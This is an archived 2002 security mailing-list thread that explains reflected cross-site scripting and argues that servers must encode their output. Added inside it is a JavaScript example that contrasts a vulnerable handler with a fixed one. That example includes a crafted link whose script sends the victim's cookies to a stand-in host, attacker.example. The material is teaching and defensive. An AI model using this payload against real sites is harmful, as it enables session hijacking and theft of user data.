Re: XSS Questions

From: Martin Wasson (martin_wassonat_private)
Date: Tue Dec 10 2002 - 10:24:40 PST


    John,
    The vulnerability is in that the server does not sanitize data it sends to
    the client.  Sanitizing input notwithstanding, a server must sanitize its
    output to avoid this lawlessness.  Otherwise an eville haxor can get your
    site to send your customer a link to his site, wherein your customer's box
    can unwittingly execute malicious code, and BOOM !! therefore divulge lots
    of sensitive data, e.g.  username, password, SSN, home address, etc.  Get
    it?  BOOM !!....John Madden.....  I kill me.  So accepting user input
    doesn't matter in this situation...it's the output, bro.
    
    
    Marty Wasson
    Web Security Admin
    Mastercard International
    martin_wassonat_private
    
    
    John Madden <chiwawa999@yahoo.com>
    To: pen-testat_private
    cc: (bcc: Martin Wasson/STL/MASTERCARD)
    Subject: XSS Questions
    12/07/02 08:36 AM
    
    Hello all,
    
    Being new to XSS and seeing a lot of messages in the
    last couple of weeks on the subject got me wondering...
    
    What is the real vulnerability if the site in
    question is vulnerable to XSS but does not let you
    write any malicious scripts on the system, like
    message board, forums etc... ? Can anything be done to
    exploit XSS if the above scenario occurs ? I know it
    depends on the web server, packages installed etc...
    I'm asking in general: is it possible ?
    
    Great, you can do the document.cookie and view your
    cookie, that might give a hint on the structure but...
    or redirect yourself to another web site :) etc...
    
    I've read the document on XSS by David Endler
    http://www.idefense.com/papers.html but still have
    some questions.
    
    If possible, can the XSS gurus on the list shed some
    light on the subject.
    
    Thanks for your time,
    
    Cheers
    
    
    ----------------------------------------------------------------------------
    
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
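The reflected case Marty describes above, as an added example that is not part of the original thread: a page that echoes a query parameter into the HTML it sends back, beside the same page with output encoding, and the kind of crafted link an attacker would send so that the victim's own browser posts document.cookie to the attacker's host. Nothing is stored on the site; the script rides along in the link. The handler names, the hostnames bank.example and attacker.example, and the URLs are assumptions made for this illustration.

```javascript
// Added example (not from the original post): reflected XSS in a page that
// echoes a query parameter back to the client, beside the fixed version that
// HTML-encodes its output. Hostnames and handler names are hypothetical.

// Minimal HTML entity encoding for text placed inside an element body or a
// double-quoted attribute value. The ampersand must be encoded first so the
// entities produced for the other characters are not encoded twice.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: the "name" query parameter is written straight into the HTML
// the server sends back, so whatever the link carried is rendered as markup.
function renderGreetingVulnerable(url) {
  const name = new URL(url).searchParams.get("name") || "guest";
  return `<html><body><h1>Hello, ${name}</h1></body></html>`;
}

// Fixed: the same page, but the untrusted value is encoded on output. The
// input is accepted unchanged; the browser just sees text, not markup.
function renderGreetingSafe(url) {
  const name = new URL(url).searchParams.get("name") || "guest";
  return `<html><body><h1>Hello, ${escapeHtml(name)}</h1></body></html>`;
}

// The attacker's crafted link (constructed for this example). The site does
// not store anything; the script is carried in the link the victim clicks,
// and the server reflects it. The payload sends document.cookie to the
// attacker's host by loading an image from a URL that contains the cookie.
const ATTACKER_HOST = "https://attacker.example"; // hypothetical
const PAYLOAD =
  `<script>new Image().src="${ATTACKER_HOST}/c?"` +
  `+encodeURIComponent(document.cookie)</script>`;
const MALICIOUS_LINK =
  "https://bank.example/greet?name=" + encodeURIComponent(PAYLOAD);

// Crude check standing in for the browser: does the rendered page contain a
// live <script> element? An encoded "&lt;script&gt;" is only text.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Render the same crafted link through both handlers and report whether a
// script element reaches the client in each case.
function demo() {
  const vuln = renderGreetingVulnerable(MALICIOUS_LINK);
  const safe = renderGreetingSafe(MALICIOUS_LINK);
  return {
    vulnerableHasScript: containsScriptTag(vuln), // true
    safeHasScript: containsScriptTag(safe),       // false
    vulnerableHtml: vuln,
    safeHtml: safe,
  };
}

console.log(demo());
```

The encoding shown is correct only for text placed in an element body or a quoted attribute. A value written into a JavaScript string, an inline event handler, a URL, or CSS needs the encoding for that context instead; one HTML-entity routine applied everywhere is the usual way output encoding goes wrong.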
    
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Tue Dec 10 2002 - 13:26:26 PST